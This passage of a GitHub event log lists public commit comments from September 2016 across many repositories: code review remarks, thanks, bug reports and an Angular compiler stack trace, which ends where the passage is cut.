{"id":"4635129772","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19219065,"position":null,"line":null,"path":null,"commit_id":"8bfd1d6afd3428159a0176fd3e91fc82f0624c9e","created_at":"2016-09-29T05:29:14Z","updated_at":"2016-09-29T05:29:14Z","body":"revision hash works now thanks sky"}},"created_at":"2016-09-29T05:29:14Z"}
{"id":"4635129800","type":"CommitCommentEvent","actor":{"login":"infernalsirius"},"repo":{"name":"infernalsirius/ReactTutorial"},"payload":{"comment":{"id":19219066,"position":null,"line":null,"path":null,"commit_id":"1169c9e2ec8a6f3793501decf9f0376145c0fbde","created_at":"2016-09-29T05:29:15Z","updated_at":"2016-09-29T05:29:15Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Following REACT tutorial.](https://trello.com/c/jWjW6zA8/15-following-react-tutorial)"}},"created_at":"2016-09-29T05:29:15Z"}
{"id":"4635130243","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19219068,"position":null,"line":null,"path":null,"commit_id":"aff39fa2f141f78326f2f30d5d81a195f551746d","created_at":"2016-09-29T05:29:27Z","updated_at":"2016-09-29T05:29:27Z","body":"Fixed"}},"created_at":"2016-09-29T05:29:27Z"}
{"id":"4635131665","type":"CommitCommentEvent","actor":{"login":"kabalane"},"repo":{"name":"kabalane/friendly-spoon"},"payload":{"comment":{"id":19219072,"position":null,"line":null,"path":null,"commit_id":"1e05b315070f651cb4628163bd920208121f5cc4","created_at":"2016-09-29T05:30:03Z","updated_at":"2016-09-29T05:30:03Z","body":"Hello, \r\nI like to practice some web development"}},"created_at":"2016-09-29T05:30:03Z"}
{"id":"4635131844","type":"CommitCommentEvent","actor":{"login":"ABOLFAZLaaaa"},"repo":{"name":"ABOLFAZLaaaa/tele-plus"},"payload":{"comment":{"id":19219073,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-29T05:30:08Z","updated_at":"2016-09-29T05:30:08Z","body":" sudo_users = {204796071},"}},"created_at":"2016-09-29T05:30:08Z"}
{"id":"4635131889","type":"CommitCommentEvent","actor":{"login":"r-escobar"},"repo":{"name":"epenning/flippy-flop"},"payload":{"comment":{"id":19219074,"position":null,"line":null,"path":null,"commit_id":"045d5e1f0279efe0f697d41ee0e6ae06f7a0216d","created_at":"2016-09-29T05:30:09Z","updated_at":"2016-09-29T05:30:09Z","body":"I also switched the flip button to W"}},"created_at":"2016-09-29T05:30:09Z"}
{"id":"4635135748","type":"CommitCommentEvent","actor":{"login":"ojaz"},"repo":{"name":"ojaz/sys-config"},"payload":{"comment":{"id":19219082,"position":4,"line":12,"path":"install.sh","commit_id":"e3879e9100dc95e943f623d4dcca81a8aea81e39","created_at":"2016-09-29T05:31:41Z","updated_at":"2016-09-29T05:31:41Z","body":"It was late...this is what happens..."}},"created_at":"2016-09-29T05:31:41Z"}
{"id":"4635135810","type":"CommitCommentEvent","actor":{"login":"damianlattenero"},"repo":{"name":"marchionne-lattenero/unq-tip-frontend"},"payload":{"comment":{"id":19219083,"position":null,"line":null,"path":null,"commit_id":"04e192054d84cc18d895e432448cb2f7fe650a39","created_at":"2016-09-29T05:31:42Z","updated_at":"2016-09-29T05:31:42Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor de la estructura del proyecto Frontend](https://trello.com/c/2aZIvpZ4/6-refactor-de-la-estructura-del-proyecto-frontend)"}},"created_at":"2016-09-29T05:31:42Z"}
{"id":"4635136977","type":"CommitCommentEvent","actor":{"login":"jerrybendy"},"repo":{"name":"jerrybendy/phpstorm-webstorm-skills"},"payload":{"comment":{"id":19219084,"position":40,"line":24,"path":"docs/002.keyboard-shortcuts-you-cannot-miss.md","commit_id":"0df6b7a14aea310a71efabcc6ad7d660c27412f0","created_at":"2016-09-29T05:32:13Z","updated_at":"2016-09-29T05:32:13Z","body":"我是优惠的时候买的，50元。中文对齐这个我也试过，没办法。。即使用等宽字体也只是英文和空格等宽，中文还是不等宽的，对不齐"}},"created_at":"2016-09-29T05:32:13Z"}
{"id":"4635145834","type":"CommitCommentEvent","actor":{"login":"zhaoyixim"},"repo":{"name":"genyii/funshop"},"payload":{"comment":{"id":19219091,"position":null,"line":null,"path":null,"commit_id":"53681173041eb84c160203fb3e3926cb5c961e9e","created_at":"2016-09-29T05:35:57Z","updated_at":"2016-09-29T05:35:57Z","body":"怎么安装都不对，，，。，，，后台就是访问不了"}},"created_at":"2016-09-29T05:35:57Z"}
{"id":"4635145913","type":"CommitCommentEvent","actor":{"login":"sabival89"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":19219090,"position":null,"line":null,"path":null,"commit_id":"d880fb5f85b9db3c50c05ef6a7d185fb84126e59","created_at":"2016-09-29T05:35:57Z","updated_at":"2016-09-29T05:35:57Z","body":"\"php artisan tinker\" doesn't work on version 5.3. Errors identified on helpers.php"}},"created_at":"2016-09-29T05:35:57Z"}
{"id":"4635146306","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"TyukineevDmitriy/Triangle"},"payload":{"comment":{"id":19219092,"position":null,"line":null,"path":null,"commit_id":"9c351d3681293b68b49724ecd484f8caa717c365","created_at":"2016-09-29T05:36:09Z","updated_at":"2016-09-29T05:36:09Z","body":"Запуште .csproj и .sln файлы"}},"created_at":"2016-09-29T05:36:09Z"}
{"id":"4635146478","type":"CommitCommentEvent","actor":{"login":"rrdds"},"repo":{"name":"rrdds/treasure_app"},"payload":{"comment":{"id":19219093,"position":null,"line":null,"path":null,"commit_id":"36d0990e813bb663f293c8058cb8cbda4defccd7","created_at":"2016-09-29T05:36:13Z","updated_at":"2016-09-29T05:36:13Z","body":"This should mention #16."}},"created_at":"2016-09-29T05:36:13Z"}
{"id":"4635147190","type":"CommitCommentEvent","actor":{"login":"wwiiiii"},"repo":{"name":"GAONNR/dancing-machine"},"payload":{"comment":{"id":19219096,"position":null,"line":null,"path":null,"commit_id":"76fff5e23dde1c0b1f41c41b17412514b867928c","created_at":"2016-09-29T05:36:30Z","updated_at":"2016-09-29T05:36:30Z","body":"너무 무섭고 떨리고 그렇네여;;;"}},"created_at":"2016-09-29T05:36:30Z"}
{"id":"4635147194","type":"CommitCommentEvent","actor":{"login":"bkueng"},"repo":{"name":"PX4/sitl_gazebo"},"payload":{"comment":{"id":19219097,"position":null,"line":null,"path":null,"commit_id":"1cb5bd7d218ee3a6c909361e489634120dd9eaa3","created_at":"2016-09-29T05:36:30Z","updated_at":"2016-09-29T05:36:30Z","body":"I'll need to update the angles, once https://github.com/PX4/Firmware/pull/5537 goes in."}},"created_at":"2016-09-29T05:36:30Z"}
{"id":"4635148767","type":"CommitCommentEvent","actor":{"login":"xavier-rdo"},"repo":{"name":"manala/manala"},"payload":{"comment":{"id":19219102,"position":61,"line":81,"path":"src/Command/CheckRequirements.php","commit_id":"fb1d1e27d26593dfcd4c323c9e4675e7764a7ba8","created_at":"2016-09-29T05:37:08Z","updated_at":"2016-09-29T05:37:08Z","body":"👍 everything's OK ; sorry, i initially published a wrong comment. ;)"}},"created_at":"2016-09-29T05:37:08Z"}
{"id":"4635149891","type":"CommitCommentEvent","actor":{"login":"pvalsecc"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19219103,"position":18,"line":5274,"path":"src/providers/spatialite/qgsspatialiteprovider.cpp","commit_id":"137a667dc2b623e51df1b4927c23cda67e298957","created_at":"2016-09-29T05:37:33Z","updated_at":"2016-09-29T05:37:33Z","body":"Yes, there is a good reason: SqlLite doesn't support relations between databases. Maybe you can do them artificially with an external software, but within SqlLite, there is no such thing."}},"created_at":"2016-09-29T05:37:33Z"}
{"id":"4635152715","type":"CommitCommentEvent","actor":{"login":"Diluka"},"repo":{"name":"DONGChuan/GradleUserGuide"},"payload":{"comment":{"id":19219109,"position":29,"line":46,"path":"build_script_basics/configure_by_dag.md","commit_id":"3be635af6b65a4a4c1ac4f6679ad4f7051d6c2e0","created_at":"2016-09-29T05:38:40Z","updated_at":"2016-09-29T05:38:40Z","body":"后面两个`release`应该是`distribution`吧？"}},"created_at":"2016-09-29T05:38:40Z"}
{"id":"4635153047","type":"CommitCommentEvent","actor":{"login":"pvalsecc"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19219110,"position":17,"line":5273,"path":"src/providers/spatialite/qgsspatialiteprovider.cpp","commit_id":"137a667dc2b623e51df1b4927c23cda67e298957","created_at":"2016-09-29T05:38:47Z","updated_at":"2016-09-29T05:38:47Z","body":"OK, fixing the variable name. You guy are a bit picky..."}},"created_at":"2016-09-29T05:38:47Z"}
{"id":"4635155290","type":"CommitCommentEvent","actor":{"login":"andela-cdaniel"},"repo":{"name":"andela-tpeters/peictt"},"payload":{"comment":{"id":19219114,"position":6,"line":40,"path":"lib/peictt.rb","commit_id":"2f4d29de01b20b44eaf3b62a296f40ae38777cb8","created_at":"2016-09-29T05:39:34Z","updated_at":"2016-09-29T05:39:34Z","body":"What is the purpose of this method? Looks like it is doing nothing for now and should probably not be here"}},"created_at":"2016-09-29T05:39:34Z"}
{"id":"4635156231","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19219117,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T05:39:57Z","updated_at":"2016-09-29T05:39:57Z","body":"测试了。除了那个停止运行之外，如丝般顺滑。"}},"created_at":"2016-09-29T05:39:57Z"}
{"id":"4635156235","type":"CommitCommentEvent","actor":{"login":"vinniefalco"},"repo":{"name":"vinniefalco/Beast"},"payload":{"comment":{"id":19219118,"position":35,"line":53,"path":"include/beast/websocket/detail/mask.hpp","commit_id":"8eac73fb251ada352e85fee40af72e32c74cbfd4","created_at":"2016-09-29T05:39:57Z","updated_at":"2016-09-29T05:39:57Z","body":"I need to look at this more closely"}},"created_at":"2016-09-29T05:39:57Z"}
{"id":"4635158464","type":"CommitCommentEvent","actor":{"login":"jwvg0425"},"repo":{"name":"pjc0247/unifiler"},"payload":{"comment":{"id":19219125,"position":null,"line":null,"path":null,"commit_id":"f453331c5aef3655a15ef292f6d0ecdc6ed0d29b","created_at":"2016-09-29T05:40:51Z","updated_at":"2016-09-29T05:40:51Z","body":"넥커톤이 머지"}},"created_at":"2016-09-29T05:40:51Z"}
{"id":"4635162172","type":"CommitCommentEvent","actor":{"login":"jrief"},"repo":{"name":"racitup/django-admin-sortable2"},"payload":{"comment":{"id":19219133,"position":14,"line":381,"path":"adminsortable2/admin.py","commit_id":"6f09a622991eddbf9c07f02cf3f4239c1b262365","created_at":"2016-09-29T05:42:23Z","updated_at":"2016-09-29T05:42:23Z","body":"``super()`` does not work in Python2"}},"created_at":"2016-09-29T05:42:23Z"}
{"id":"4635163908","type":"CommitCommentEvent","actor":{"login":"jrief"},"repo":{"name":"racitup/django-admin-sortable2"},"payload":{"comment":{"id":19219139,"position":13,"line":380,"path":"adminsortable2/admin.py","commit_id":"6f09a622991eddbf9c07f02cf3f4239c1b262365","created_at":"2016-09-29T05:43:05Z","updated_at":"2016-09-29T05:43:05Z","body":"use a logger, or ``warning.warn`` to print warning messages."}},"created_at":"2016-09-29T05:43:05Z"}
{"id":"4635164790","type":"CommitCommentEvent","actor":{"login":"rwest"},"repo":{"name":"CHME5137/github-assignment"},"payload":{"comment":{"id":19219143,"position":null,"line":null,"path":null,"commit_id":"b84f3f4339cc2061e68652c9fbb013f0e3992911","created_at":"2016-09-29T05:43:25Z","updated_at":"2016-09-29T05:43:25Z","body":"The commit looks good, but your profile https://github.com/jtr5395 doesn't list your name, so you didn't actually complete the assignment yet."}},"created_at":"2016-09-29T05:43:25Z"}
{"id":"4635171021","type":"CommitCommentEvent","actor":{"login":"sunShineGentleman"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":19219158,"position":3,"line":3,"path":"docs/warnings/invalid-aria-prop.md","commit_id":"59ff7749eda0cd858d5ee568315bcba1be75a1ca","created_at":"2016-09-29T05:45:41Z","updated_at":"2016-09-29T05:45:41Z","body":"public "}},"created_at":"2016-09-29T05:45:41Z"}
{"id":"4635171254","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19219160,"position":null,"line":null,"path":null,"commit_id":"ce07ac97d4191c9bbf0e31055e2ceb95e656de27","created_at":"2016-09-29T05:45:49Z","updated_at":"2016-09-29T05:45:49Z","body":"I tested it out, and it works in Python. https://github.com/pizzaisdavid/p2p-project/commit/2d1a73232864eb860e26621ba8893a8384e9763f"}},"created_at":"2016-09-29T05:45:49Z"}
{"id":"4635171892","type":"CommitCommentEvent","actor":{"login":"sunShineGentleman"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":19219163,"position":3,"line":3,"path":"docs/warnings/invalid-aria-prop.md","commit_id":"59ff7749eda0cd858d5ee568315bcba1be75a1ca","created_at":"2016-09-29T05:46:01Z","updated_at":"2016-09-29T05:46:01Z","body":"fda"}},"created_at":"2016-09-29T05:46:01Z"}
{"id":"4635175593","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"TyukineevDmitriy/Triangle"},"payload":{"comment":{"id":19219168,"position":48,"line":48,"path":"Triangle/Triangle.cs","commit_id":"9c351d3681293b68b49724ecd484f8caa717c365","created_at":"2016-09-29T05:47:26Z","updated_at":"2016-09-29T05:47:26Z","body":"Так себе имя переменной"}},"created_at":"2016-09-29T05:47:26Z"}
{"id":"4635177120","type":"CommitCommentEvent","actor":{"login":"sunShineGentleman"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":19219172,"position":null,"line":null,"path":null,"commit_id":"59ff7749eda0cd858d5ee568315bcba1be75a1ca","created_at":"2016-09-29T05:47:57Z","updated_at":"2016-09-29T05:47:57Z","body":"what`s meaning"}},"created_at":"2016-09-29T05:47:57Z"}
{"id":"4635180470","type":"CommitCommentEvent","actor":{"login":"miyagawa"},"repo":{"name":"kazeburo/Cookie-Baker"},"payload":{"comment":{"id":19219181,"position":5,"line":90,"path":"lib/Cookie/Baker.pm","commit_id":"b923892b5a4d128fd429239bc612f76d0d37fd78","created_at":"2016-09-29T05:49:13Z","updated_at":"2016-09-29T05:49:13Z","body":"were there any reason to avoid using `//` in split's first argument?"}},"created_at":"2016-09-29T05:49:13Z"}
{"id":"4635181550","type":"CommitCommentEvent","actor":{"login":"kzoltan"},"repo":{"name":"andreisimedre/drupal-minishop"},"payload":{"comment":{"id":19219185,"position":15,"line":134,"path":"sites/all/modules/wishlist/wishlist.module","commit_id":"6b9ae3201d382f1f2bf10cb093e5eb0784ad184c","created_at":"2016-09-29T05:49:37Z","updated_at":"2016-09-29T05:49:37Z","body":"The user input from the form are available in $form_state['values']. not from the $form_state['input']"}},"created_at":"2016-09-29T05:49:37Z"}
{"id":"4635183581","type":"CommitCommentEvent","actor":{"login":"guxiaobai"},"repo":{"name":"zgt0109/TongXin"},"payload":{"comment":{"id":19219188,"position":8,"line":19,"path":"app/models/user.rb","commit_id":"7ddb78b0cd66458b8183e77e66924d0ee88f44b6","created_at":"2016-09-29T05:50:24Z","updated_at":"2016-09-29T05:50:24Z","body":"@wujunshan 合并冲突"}},"created_at":"2016-09-29T05:50:24Z"}
{"id":"4635186251","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":19219191,"position":null,"line":null,"path":null,"commit_id":"c0eae8245fe0b37a228939586aa8f4118af19f1a","created_at":"2016-09-29T05:51:23Z","updated_at":"2016-09-29T05:51:23Z","body":"+UPDATE `quest_template` SET `QuestFlags`= 0, `SpecialFlags`= 2 WHERE `entry`= 1657;\r\n\r\nWith that the quest is completed by the dbscripts_on_events script but you cant turn in.\r\nI switched it to be no \"external event\" now it works for me?"}},"created_at":"2016-09-29T05:51:23Z"}
{"id":"4635186625","type":"CommitCommentEvent","actor":{"login":"abma"},"repo":{"name":"spring/devgame.sdd"},"payload":{"comment":{"id":19219194,"position":null,"line":null,"path":null,"commit_id":"588a70fc7bf4ed2fa4842cb6f7cb0b88fec31843","created_at":"2016-09-29T05:51:32Z","updated_at":"2016-09-29T05:51:32Z","body":"awww, thanks!"}},"created_at":"2016-09-29T05:51:32Z"}
{"id":"4635186765","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"lpinca/shopify-token"},"payload":{"comment":{"id":19219195,"position":21,"line":58,"path":"index.js","commit_id":"70f3e58bd99c635610c6a20ee5c95c10bdb17bc3","created_at":"2016-09-29T05:51:35Z","updated_at":"2016-09-29T05:51:35Z","body":"Yes, I did it on purpose to also allow `0` which could be used for testing.\r\nWith this said I agree that a falsy value doesn't have much sense so I'm fine with changing it to `options.timeout || 60000`."}},"created_at":"2016-09-29T05:51:35Z"}
{"id":"4635186812","type":"CommitCommentEvent","actor":{"login":"venero"},"repo":{"name":"wulinzhu/hmfs"},"payload":{"comment":{"id":19219196,"position":211,"line":436,"path":"fs/hmfs/file.c","commit_id":"1ea775edb33bf7a1f690241fb55d6a5fa4430c28","created_at":"2016-09-29T05:51:36Z","updated_at":"2016-09-29T05:51:36Z","body":"`ppos` should be added as an offset to `HMFS_I(inode)->rw_addr`."}},"created_at":"2016-09-29T05:51:36Z"}
{"id":"4635186836","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19219197,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T05:51:37Z","updated_at":"2016-09-29T05:51:37Z","body":"修正停止运行 需要把FObject里边的容器都换成线程安全的。然后所有Add Remove Get的行为都要改T T。等我晚上慢慢改。"}},"created_at":"2016-09-29T05:51:37Z"}
{"id":"4635187378","type":"CommitCommentEvent","actor":{"login":"andela-cdaniel"},"repo":{"name":"andela-tpeters/peictt"},"payload":{"comment":{"id":19219199,"position":14,"line":27,"path":"lib/peictt/http/match.rb","commit_id":"2f4d29de01b20b44eaf3b62a296f40ae38777cb8","created_at":"2016-09-29T05:51:49Z","updated_at":"2016-09-29T05:51:49Z","body":"If you want to make this shorter, you can use `/^[a-z]+Controller/i`, the i (ignore case matcher) will ensure that it matches both lower and upper case characters"}},"created_at":"2016-09-29T05:51:49Z"}
{"id":"4635190741","type":"CommitCommentEvent","actor":{"login":"lulco"},"repo":{"name":"tomaj/hermes"},"payload":{"comment":{"id":19219206,"position":4,"line":9,"path":".travis.yml","commit_id":"02f3c5b80a130568f17cc6c08b684311306f4523","created_at":"2016-09-29T05:53:01Z","updated_at":"2016-09-29T05:53:01Z","body":":+1: I'd like to remove also version 5.5 It is not supported http://php.net/supported-versions.php"}},"created_at":"2016-09-29T05:53:01Z"}
{"id":"4635192472","type":"CommitCommentEvent","actor":{"login":"andela-cdaniel"},"repo":{"name":"andela-tpeters/peictt"},"payload":{"comment":{"id":19219210,"position":7,"line":22,"path":"lib/peictt/orm/base_model.rb","commit_id":"2f4d29de01b20b44eaf3b62a296f40ae38777cb8","created_at":"2016-09-29T05:53:40Z","updated_at":"2016-09-29T05:53:40Z","body":"Align method calls to start on the same line."}},"created_at":"2016-09-29T05:53:40Z"}
{"id":"4635194947","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19219213,"position":3,"line":15,"path":"language-project/dao/src/main/java/com/dao/utility/DatabaseUtil.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-29T05:54:32Z","updated_at":"2016-09-29T05:54:32Z","body":"Cделано"}},"created_at":"2016-09-29T05:54:32Z"}
{"id":"4635197459","type":"CommitCommentEvent","actor":{"login":"andela-cdaniel"},"repo":{"name":"andela-tpeters/peictt"},"payload":{"comment":{"id":19219218,"position":18,"line":48,"path":"lib/peictt/orm/base_model.rb","commit_id":"2f4d29de01b20b44eaf3b62a296f40ae38777cb8","created_at":"2016-09-29T05:55:24Z","updated_at":"2016-09-29T05:55:24Z","body":"Is `title` a mandatory column for any user of your gem? why not find by `id` instead (since it is guaranteed to most likely be a part of any generated table)"}},"created_at":"2016-09-29T05:55:24Z"}
{"id":"4635198747","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19219224,"position":5,"line":5,"path":"language-project/dao/.settings/org.eclipse.wst.common.project.facet.core.xml","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-29T05:55:48Z","updated_at":"2016-09-29T05:55:48Z","body":"http://joxi.net/v29QB83tG5qY42 - верно?"}},"created_at":"2016-09-29T05:55:48Z"}
{"id":"4635204865","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19219238,"position":null,"line":null,"path":null,"commit_id":"7516f02346a12830ed2ce80d703ab781562d9c2d","created_at":"2016-09-29T05:57:54Z","updated_at":"2016-09-29T05:57:54Z","body":"@bridiver weird, i'm not sure why. i pushed the rulesets to S3 and confirmed that they were downloaded by a fresh instance of Brave."}},"created_at":"2016-09-29T05:57:54Z"}
{"id":"4635213020","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19219268,"position":null,"line":null,"path":null,"commit_id":"7516f02346a12830ed2ce80d703ab781562d9c2d","created_at":"2016-09-29T06:00:27Z","updated_at":"2016-09-29T06:00:27Z","body":"I actually don't think this is related, just a coincidence"}},"created_at":"2016-09-29T06:00:27Z"}
{"id":"4635217188","type":"CommitCommentEvent","actor":{"login":"kisoo-han"},"repo":{"name":"kisoo-han/cubrid-testcases"},"payload":{"comment":{"id":19219288,"position":null,"line":null,"path":null,"commit_id":"1ca4d1281561bd79374067392ab7bea4951cf22a","created_at":"2016-09-29T06:01:45Z","updated_at":"2016-09-29T06:01:45Z","body":"Sorry, this test case should go to develop branch. Please IGNORE this, its a mistake."}},"created_at":"2016-09-29T06:01:45Z"}
{"id":"4635220168","type":"CommitCommentEvent","actor":{"login":"jwvg0425"},"repo":{"name":"pjc0247/Unity.Profiler.Ext"},"payload":{"comment":{"id":19219296,"position":null,"line":null,"path":null,"commit_id":"39b025f67501008107ee3736908ad59d7f5a4e32","created_at":"2016-09-29T06:02:43Z","updated_at":"2016-09-29T06:02:43Z","body":"멋져"}},"created_at":"2016-09-29T06:02:43Z"}
{"id":"4635223623","type":"CommitCommentEvent","actor":{"login":"andela-cdaniel"},"repo":{"name":"andela-tpeters/peictt"},"payload":{"comment":{"id":19219302,"position":24,"line":53,"path":"lib/peictt/orm/base_model.rb","commit_id":"2f4d29de01b20b44eaf3b62a296f40ae38777cb8","created_at":"2016-09-29T06:03:56Z","updated_at":"2016-09-29T06:03:56Z","body":"The `values` variable looks like it's been used without being initialized any where else. Also, this looks like you are calling `send` on the global object (any reason for this?)."}},"created_at":"2016-09-29T06:03:56Z"}
{"id":"4635226806","type":"CommitCommentEvent","actor":{"login":"tbaddade"},"repo":{"name":"yakamara/yconverter"},"payload":{"comment":{"id":19219304,"position":673,"line":673,"path":"lib/YConverter/Converter.php","commit_id":"dd728dd002119e4e0fb7147deccd6a428027c010","created_at":"2016-09-29T06:04:59Z","updated_at":"2016-09-29T06:04:59Z","body":"Hab das angepasst. Da man die Seite sowieso noch kontrollieren muss, können die auch gleich `online` sein."}},"created_at":"2016-09-29T06:04:59Z"}
{"id":"4635228700","type":"CommitCommentEvent","actor":{"login":"gallons"},"repo":{"name":"gallons/firstTest"},"payload":{"comment":{"id":19219307,"position":null,"line":null,"path":null,"commit_id":"8eead77a0ec17c1ee2b04a752b1d56bc39ebac02","created_at":"2016-09-29T06:05:36Z","updated_at":"2016-09-29T06:05:36Z","body":"hello world"}},"created_at":"2016-09-29T06:05:36Z"}
{"id":"4635229589","type":"CommitCommentEvent","actor":{"login":"stcherenkov"},"repo":{"name":"nonmanifold/svg-inline-loader"},"payload":{"comment":{"id":19219311,"position":6,"line":36,"path":"README.md","commit_id":"2ffa1c01cdc286015f219e881c70b557ea7f85c7","created_at":"2016-09-29T06:05:53Z","updated_at":"2016-09-29T06:05:53Z","body":"You should not warn about title — it is commonly used for accessibility."}},"created_at":"2016-09-29T06:05:53Z"}
{"id":"4635231086","type":"CommitCommentEvent","actor":{"login":"stcherenkov"},"repo":{"name":"nonmanifold/svg-inline-loader"},"payload":{"comment":{"id":19219314,"position":6,"line":36,"path":"README.md","commit_id":"2ffa1c01cdc286015f219e881c70b557ea7f85c7","created_at":"2016-09-29T06:06:24Z","updated_at":"2016-09-29T06:06:24Z","body":"Just wrong example, I suppose."}},"created_at":"2016-09-29T06:06:24Z"}
{"id":"4635231364","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19219316,"position":17,"line":5273,"path":"src/providers/spatialite/qgsspatialiteprovider.cpp","commit_id":"137a667dc2b623e51df1b4927c23cda67e298957","created_at":"2016-09-29T06:06:29Z","updated_at":"2016-09-29T06:06:29Z","body":"If you're looking for motivation to pick good variable names... try digging into the pal code. You'll forevermore become ultra picky with variable names too!"}},"created_at":"2016-09-29T06:06:29Z"}
{"id":"4635233493","type":"CommitCommentEvent","actor":{"login":"pritesh"},"repo":{"name":"romana/romana"},"payload":{"comment":{"id":19219319,"position":5,"line":94,"path":"romana-install/roles/romana/install-master/templates/config/romana.conf.yml","commit_id":"70c5b50557ea70654717f337451bbc197ac0a5d1","created_at":"2016-09-29T06:07:15Z","updated_at":"2016-09-29T06:07:15Z","body":"https://github.com/paninetworks/romana/commit/4880b0db103eecda93062b5066637c538e2e2307"}},"created_at":"2016-09-29T06:07:15Z"}
{"id":"4635237190","type":"CommitCommentEvent","actor":{"login":"andela-cdaniel"},"repo":{"name":"andela-tpeters/peictt"},"payload":{"comment":{"id":19219330,"position":null,"line":null,"path":null,"commit_id":"2f4d29de01b20b44eaf3b62a296f40ae38777cb8","created_at":"2016-09-29T06:08:30Z","updated_at":"2016-09-29T06:08:30Z","body":"Overall, this looks good. Nice work bro"}},"created_at":"2016-09-29T06:08:30Z"}
{"id":"4635239014","type":"CommitCommentEvent","actor":{"login":"isidorn"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19219335,"position":null,"line":null,"path":null,"commit_id":"48af04a01cd5a7c4b970404184af3d52c01d6625","created_at":"2016-09-29T06:09:07Z","updated_at":"2016-09-29T06:09:07Z","body":"@Tyriar misclick - wanted to remove terminal.svg. Thanks a lot for cleaning up my mess!"}},"created_at":"2016-09-29T06:09:07Z"}
{"id":"4635239168","type":"CommitCommentEvent","actor":{"login":"Chronin"},"repo":{"name":"smurph/Space-Game"},"payload":{"comment":{"id":19219336,"position":7,"line":7,"path":"Assets/PlayerShipMovement.cs","commit_id":"2275e82b69a078320a2fbd52549089ac4d984db0","created_at":"2016-09-29T06:09:11Z","updated_at":"2016-09-29T06:09:11Z","body":"Could use some tooltips for public members\r\n\r\n[Tooltip(\"Blah.\")]"}},"created_at":"2016-09-29T06:09:11Z"}
{"id":"4635243514","type":"CommitCommentEvent","actor":{"login":"darkmord1991"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19219345,"position":null,"line":null,"path":null,"commit_id":"8f9a5e14120f422919e75ea1d25e127301533de2","created_at":"2016-09-29T06:10:37Z","updated_at":"2016-09-29T06:10:37Z","body":"Good Job :)"}},"created_at":"2016-09-29T06:10:37Z"}
{"id":"4635245429","type":"CommitCommentEvent","actor":{"login":"zbicklin"},"repo":{"name":"zbicklin/TestOne"},"payload":{"comment":{"id":19219348,"position":4,"line":4,"path":"main.cpp","commit_id":"486258d0794d7a98b4c16a5a40afd0d7a17f7c33","created_at":"2016-09-29T06:11:17Z","updated_at":"2016-09-29T06:11:17Z","body":"hello"}},"created_at":"2016-09-29T06:11:17Z"}
{"id":"4635248119","type":"CommitCommentEvent","actor":{"login":"mdaveynis"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19219354,"position":16,"line":451,"path":"modules/@angular/compiler-cli/src/static_reflector.ts","commit_id":"b58e9ea7751a7be9e66012e26236e566b2a8b89b","created_at":"2016-09-29T06:12:14Z","updated_at":"2016-09-29T06:12:14Z","body":"Change from `selectTarget[member]` to `simplify(selectTarget[member])` broke ngc in web worker scenario with error below. Do I need specific settings for web worker?\r\n\r\nError: parameters received {\"filePath\":\"/node_modules/@angular/platform-browser/src/security/dom_sanitization_service.d.ts\",\"name\":\"DomSanitizerImpl\"} which is not a StaticSymbol\r\n    at StaticReflector.parameters (\\node_modules\\@angular\\compiler-cli\\src\\static_reflector.js:92:19)\r\nProcess terminated with code 1.\r\n    at CompileMetadataResolver.getDependenciesMetadata (\\node_modules\\@angular\\compiler\\bundles\\compiler.umd.js:14317:56)\r\n    at CompileMetadataResolver.getTypeMetadata (\\node_modules\\@angular\\compiler\\bundles\\compiler.umd.js:14282:28)\r\n    at CompileMetadataResolver.getProviderMetadata (\\node_modules\\@angular\\compiler\\bundles\\compiler.umd.js:14473:42)\r\n    at \\node_modules\\@angular\\compiler\\bundles\\compiler.umd.js:14421:47\r\n    at Array.forEach (native)\r\n    at CompileMetadataResolver.getProvidersMetadata (\\node_modules\\@angular\\compiler\\bundles\\compiler.umd.js:14405:21)\r\n    at \\node_modules\\@angular\\compiler\\bundles\\compiler.umd.js:14412:43\r\n    at Array.forEach (native)\r\n    at CompileMetadataResolver.getProvidersMetadata 